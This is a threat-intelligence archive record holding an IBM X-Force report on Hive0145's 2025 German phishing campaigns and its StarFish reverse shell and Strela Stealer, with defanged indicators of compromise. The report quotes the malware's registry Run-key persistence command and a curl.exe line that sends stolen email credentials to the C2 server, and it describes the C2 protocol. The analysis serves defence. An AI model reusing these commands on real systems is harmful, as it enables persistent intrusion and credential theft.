{ "id": "99dc087c-df00-4eb0-8427-600f8a7eee7a", "created_at": "2026-04-06T01:30:12.54923Z", "updated_at": "2026-04-10T13:12:41.211947Z", "deleted_at": null, "sha1_hash": "46f7701738004eb887395460266978cf31cec181", "title": "Hive0145 back in German inboxes with Strela Stealer and a backdoor", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 1082292, "plain_text": "Hive0145 back in German inboxes with Strela Stealer and a\r\nbackdoor\r\nBy Golo Mühr, Chris Caridi\r\nPublished: 2025-07-10 · Archived: 2026-04-06 00:17:44 UTC\r\nAs of early June 2025, IBM X-Force observed new phishing campaigns attributed to Hive0145. This threat actor\r\nis known for their delivery of Strela Stealer to exfiltrate email credentials since at least 2022. Hive0145's latest\r\ncampaigns targeting Germany make use of malicious SVG files to download a simple reverse shell that X-Force\r\nnamed StarFish. The StarFish script supports persistent access and the deployment of follow-on payloads for the\r\nfirst time. This new capability marks a clear shift in intent for the threat actor and translates into a higher risk for\r\nvictims in comparison to previous campaigns. Among the observed secondary payloads were a screenshot module\r\nand a PowerShell-based implementation of Strela Stealer.\r\nHive0145 continues to target Germany in high-volume phishing campaigns through June and July 2025\r\nAs of June 2025, Hive0145 uses SVG files to drop a reverse shell malware, StarFish, enabling persistent\r\naccess to infected machines\r\nAmong the secondary payloads, X-Force discovered a screenshot module and a PowerShell-based\r\nimplementation of Strela Stealer\r\nX-Force first began observing heightened activity from Hive0145 in April 2023. This threat actor is assessed to be\r\nfinancially motivated and is likely functioning as an initial access broker (IAB). Hive0145 stands out from the\r\nthreat landscape due to its evolving techniques and tightly limited scope of actions on the objective, with a central\r\nfocus on email credentials. The group is believed to be the exclusive operator of Strela Stealer–a credential-harvesting malware designed to extract login information from Microsoft Outlook and Mozilla Thunderbird.\r\nAlthough the malware has been implemented in C, .NET and now PowerShell, the original functionality has not\r\nchanged. This kind of data theft often sets the stage for Business Email Compromise (BEC) attacks.\r\nIABs like Hive0145 play a crucial role in the cyber criminal ecosystem by acquiring and selling access to\r\ncompromised environments. They typically offload stolen credentials and other valuable data to third-party actors\r\nwho specialize in other aspects of the attack chain. While this is standard practice for IABs, it remains unclear\r\nwhether Hive0145 is aligned with any specific buyers or affiliates when distributing access gained through their\r\noperations.\r\nPrevious activity\r\nHive0145’s activity began in late 2022 with basic phishing campaigns delivering Strela Stealer via malicious\r\nemail attachments. These early efforts primarily targeted Spanish-speaking users and focused on credential theft\r\nfrom Outlook and Thunderbird. The emails used generic invoice lures and relied on basic social engineering\r\ntactics.\r\nhttps://www.ibm.com/think/x-force/hive0145-back-in-german-inboxes-with-strela-stealer\r\nPage 1 of 12\n\nBy early 2023, Hive0145 expanded its targeting to include users in Germany and Italy. These campaigns showed\r\nimproved localization, using translated lures and more region-specific content. The malware delivery remained\r\nattachment-based, but the phishing emails grew more tailored to increase credibility. Around mid-2024, the actor\r\nshifted to a more advanced technique: hijacking legitimate invoice emails. They would manipulate real stolen\r\nemails and replace original attachments with weaponized ZIP files containing obfuscated JavaScript loaders.\r\nIn late 2023 and early 2024, Hive0145 incorporated polyglot files, valid code-signing certificates and new crypters\r\nlike Stellar Loader to improve evasion. The targeting expanded further to include systems with Catalan, Polish and\r\nBasque locales, showing broader regional intent. By mid-2024, campaigns became more frequent and structured,\r\nwith Hive0145 launching phishing waves on a near-weekly basis. Ukrainian targets were added to the scope, and\r\nStrela Stealer was updated to collect system metadata and application inventories, signaling a shift toward more\r\ncomprehensive reconnaissance alongside credential theft.\r\nIn early June 2025, X-Force observed another Hive0145 email phishing campaign targeting Germany. The threat\r\nactors used real emails, likely stolen from previous infections, along with the corresponding attachment name. The\r\nattachment file type is changed to .SVG (scalable vector graphic), but it retains the original filename to maintain\r\nthe appearance of authenticity. All emails successfully pass an SPF (Sender Policy Framework) check, suggesting\r\nthat the emails are indeed being sent from a legitimate domain and not being spoofed. The vast majority of emails\r\nand attachment names contain the word \"Rechnung\" in the German language (translates to \"Invoice\") and were\r\ndated between January and May 2025.\r\nhttps://www.ibm.com/think/x-force/hive0145-back-in-german-inboxes-with-strela-stealer\r\nPage 2 of 12\n\nFig. 1: Real invoice email with hijacked attachment (SVG) used in Hive0145 phishing campaign\r\nhttps://www.ibm.com/think/x-force/hive0145-back-in-german-inboxes-with-strela-stealer\r\nPage 3 of 12\n\nThe initial campaign lasted from June 4th until June 19th and used SVG files with embedded HTML to download\r\na ZIP file containing a malicious JScript (JS). The first wave only used a handful of different download domains in\r\nthe malicious SVG droppers, all of which were taken down shortly after the campaign began, which likely limited\r\nthe number of successful downloads.\r\nFig. 2: Hive0145 campaigns targeting Germany in June and July 2025\r\nOn July 3rd, Hive0145 returned with a high volume campaign featuring a significantly larger pool of malicious\r\ndomains. \r\nIf the victim opens the SVG file on their machine, the browser will render the embedded HTML:\r\nhttps://www.ibm.com/think/x-force/hive0145-back-in-german-inboxes-with-strela-stealer\r\nPage 4 of 12\n\nFig. 3: Rendered SVG file\r\nThe HTML displays a progress bar and loads a remote script responsible for downloading a ZIP file:\r\nFig. 4: Embedded HTML loading remote script\r\nThe dropped ZIP file uses a name to suggest it contains the document a victim would expect. Instead, it contains\r\nan obfuscated JScript file which implements a simple reverse shell called StarFish. This is the first time that\r\nHive0145 was observed deploying a backdoor malware and demonstrates a clear change in intent with the new\r\ncapability to deploy arbitrary payloads.\r\nhttps://www.ibm.com/think/x-force/hive0145-back-in-german-inboxes-with-strela-stealer\r\nPage 5 of 12\n\nStarFish reverse shell\r\nUpon execution, the StarFish script generates a unique victim ID by combining the machine's product ID and\r\ncomputer name. It then sends an HTTP GET request to a hardcoded command and control (C2) server's\r\n\"server.php\" endpoint. The server responds with the string \"OK\", immediately followed by an optional command,\r\nwhich is directly executed on the machine via cmd.exe. Should the command contain the placeholder string\r\n\"%SCRIPT_NAME%\", it will be replaced with the reverse shell's path. The output of the command is sent back as\r\na POST request after command completion or a specified maximum time limit.\r\nThe first C2 command is always aimed at achieving persistence for the reverse shell through the registry:\r\nREG ADD \"HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\" /V \"System Update2\" /t REG_SZ /F\r\n/D \"wscript.exe \"\"%SCRIPT_NAME%\"\"\r\nStarFish continues to request new commands every 48 seconds. The final Strela Stealer payload is only dropped\r\nafter passing anti-sandbox checks, including an extended time of constant beaconing and a successful screenshot\r\ncapture.\r\nScreen capture\r\nAfter several minutes of beaconing, the next stage is executed: a PowerShell script named \"sc.ps1\" downloaded\r\nfrom the same server.\r\nhttps://www.ibm.com/think/x-force/hive0145-back-in-german-inboxes-with-strela-stealer\r\nPage 6 of 12\n\nFig. 5: Screen capture PowerShell script\r\nThe script takes a screenshot of the victim's current screen and attempts to upload it to the 0x0 free file hoster\r\n(https://git.0x0.st/mia/0x0). After a successful upload, the file hoster sends back a unique URL to view the\r\nscreenshot, which is relayed back to the C2 server via the reverse shell.\r\nStrela Stealer PowerShell edition\r\nThe final payload is another PowerShell script downloaded from the server's \"strel.php\" endpoint. The script is a\r\ndirect implementation of the original Strela Stealer behavior as observed in all past Hive0145 campaigns. The\r\nStealer attempts to extract, decrypt and exfiltrate email inbox credentials from the Thunderbird and Microsoft\r\nOutlook email clients.\r\nhttps://www.ibm.com/think/x-force/hive0145-back-in-german-inboxes-with-strela-stealer\r\nPage 7 of 12\n\nFig. 6: Excerpt of Strela Stealer PowerShell script\r\nAny credentials are stored in a temporary file and exfiltrated via the curl command to the server's \"up2.php\"\r\nendpoint.\r\ncurl.exe -X POST --data-binary \"@$tempFile\" $headerArgs $Uri -s -S 2\u003e\u00261\r\nX-Force also observed the \"invoice.php\" endpoint on the C2 server attempting to download or display a PDF,\r\n\"invoice.pdf\". This is likely used as a decoy measure and has been observed in previous Strela Stealer campaigns\r\norchestrated by Hive0145.\r\nHive0145 is a highly capable threat actor showing a strong motivation to adapt over the past years. With the latest\r\ncampaign's shift towards backdoor malware with persistent access, the threat actor demonstrates clear intent and\r\ncapability to evolve repeatedly and increase their scope outside of traditional email credential harvesting. The\r\nhttps://www.ibm.com/think/x-force/hive0145-back-in-german-inboxes-with-strela-stealer\r\nPage 8 of 12\n\nrefinement in the infection process, which now deploys Strela Stealer only after prolonged beaconing and screen\r\ncapture, underscores the increasing intent of the threat actor to evade analysis and research of later-stage payloads.\r\nLastly, Hive0145's unique approach to phishing is likely one of the main keys to its success, enabling high-volume\r\ncampaigns across targeted geographies.\r\nX-Force recommends organizations:\r\nExercise caution with emails and ZIP archive attachments\r\nEmploy detection rules for malicious SVG files that execute JavaScript and drop further payloads\r\nConsider changing the default application for JavaScript/JScript/VBScript files to Notepad\r\nMonitor curl.exe processes potentially exfiltrating data\r\nInstall and configure endpoint security software\r\nUpdate relevant network security monitoring rules\r\nEducate staff on the potential threats to the organization\r\nIndicator\r\nIndicator\r\nType\r\nContext\r\n176.65.138[.]152 IPv4 Strela Stealer C2 server\r\nupdatemsdnserver[.]com Domain Strela Stealer C2 server\r\nadvertipros[.]com Domain Hive0145 domain used for staging\r\nyorja[.]org Domain Hive0145 domain used for staging\r\nyou-ca[.]com Domain Hive0145 domain used for staging\r\nyoulocal[.]com Domain Hive0145 domain used for staging\r\nyoung-c[.]com Domain Hive0145 domain used for staging\r\nyourbookrecommendation[.]in Domain Hive0145 domain used for staging\r\nhttps://www.ibm.com/think/x-force/hive0145-back-in-german-inboxes-with-strela-stealer\r\nPage 9 of 12\n\nyouthprimerinternationalschool[.]ng Domain Hive0145 domain used for staging\r\nyouwhotravel[.]com Domain Hive0145 domain used for staging\r\nyoyely[.]nl Domain Hive0145 domain used for staging\r\nyujuseguros[.]net Domain Hive0145 domain used for staging\r\nyuliyayantsevich[.]by Domain Hive0145 domain used for staging\r\nyumeenterprises[.]com Domain Hive0145 domain used for staging\r\nyumeimise[.]net Domain Hive0145 domain used for staging\r\nyummy-station[.]com Domain Hive0145 domain used for staging\r\nywcanevada[.]org Domain Hive0145 domain used for staging\r\nyy[.]ua Domain Hive0145 domain used for staging\r\nza-business[.]com Domain Hive0145 domain used for staging\r\nzacto[.]cl Domain Hive0145 domain used for staging\r\nzadding[.]com Domain Hive0145 domain used for staging\r\nzaliamylia[.]lt Domain Hive0145 domain used for staging\r\nzalyzi63[.]ru Domain Hive0145 domain used for staging\r\nhttps://www.ibm.com/think/x-force/hive0145-back-in-german-inboxes-with-strela-stealer\r\nPage 10 of 12\n\nzapataplast[.]com[.]ar Domain Hive0145 domain used for staging\r\nzebloexpress[.]com Domain Hive0145 domain used for staging\r\nzedhdesign[.]com Domain Hive0145 domain used for staging\r\nzenithprojectsnsw[.]com[.]au Domain Hive0145 domain used for staging\r\nzetkay[.]com Domain Hive0145 domain used for staging\r\nzettabytellc[.]com Domain Hive0145 domain used for staging\r\nzhaolearning[.]com Domain Hive0145 domain used for staging\r\nziriesgranada[.]com Domain Hive0145 domain used for staging\r\nzivalife[.]com[.]br Domain Hive0145 domain used for staging\r\nzonalatina103[.]net Domain Hive0145 domain used for staging\r\nzotzed[.]deborahjulene[.]com Domain Hive0145 domain used for staging\r\nzr-estudio[.]com[.]ar Domain Hive0145 domain used for staging\r\nzyzzyva[.]pipesnmetals[.]com Domain Hive0145 domain used for staging\r\n7fd10cb4968e5a64dde6911f87\r\nedf6cddc10d972d0b6194e3eb\r\n21aff1b6f8e10\r\nSHA256\r\nExample hash for StarFish reverse shell on\r\nVirusTotal\r\nhttps://www.ibm.com/think/x-force/hive0145-back-in-german-inboxes-with-strela-stealer\r\nPage 11 of 12\n\n47e5a19f37374754b2a3f4c6297\r\nb1d9592e0a613bae307dddd212\r\n06957aa6360\r\nSHA256\r\nExample hash for StarFish reverse shell on\r\nVirusTotal\r\nIBM X-Force Premier Threat Intelligence is now integrated with OpenCTI by Filigran, delivering actionable\r\nthreat intelligence about this threat activity and more. Access insights on threat actors, malware, and industry\r\nrisks. Install the X-Force OpenCTI Connector to enhance detection and response, strengthening your\r\ncybersecurity with IBM X-Force’s expertise. Get a 30-Day X-Force Premier Threat Intelligence trial today!\r\nSource: https://www.ibm.com/think/x-force/hive0145-back-in-german-inboxes-with-strela-stealer\r\nhttps://www.ibm.com/think/x-force/hive0145-back-in-german-inboxes-with-strela-stealer\r\nPage 12 of 12", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "origins": [ "web" ], "references": [ "https://www.ibm.com/think/x-force/hive0145-back-in-german-inboxes-with-strela-stealer" ], "report_names": [ "hive0145-back-in-german-inboxes-with-strela-stealer" ], "threat_actors": [ { "id": "28349be5-ce76-4a45-9502-707953dd2f07", "created_at": "2025-05-29T02:00:03.210059Z", "updated_at": "2026-04-10T02:00:03.86427Z", "deleted_at": null, "main_name": "HIVE-0145", "aliases": [ "Hive0145" ], "source_name": "MISPGALAXY:HIVE-0145", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "75108fc1-7f6a-450e-b024-10284f3f62bb", "created_at": "2024-11-01T02:00:52.756877Z", "updated_at": "2026-04-10T02:00:05.273746Z", "deleted_at": null, "main_name": "Play", "aliases": null, "source_name": "MITRE:Play", "tools": [ "Nltest", "AdFind", "PsExec", "Wevtutil", "Cobalt Strike", "Playcrypt", "Mimikatz" ], "source_id": "MITRE", "reports": null } ], "ts_created_at": 1775439012, "ts_updated_at": 1775826761, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/46f7701738004eb887395460266978cf31cec181.pdf", "text": "https://archive.orkl.eu/46f7701738004eb887395460266978cf31cec181.txt", "img": "https://archive.orkl.eu/46f7701738004eb887395460266978cf31cec181.jpg" } }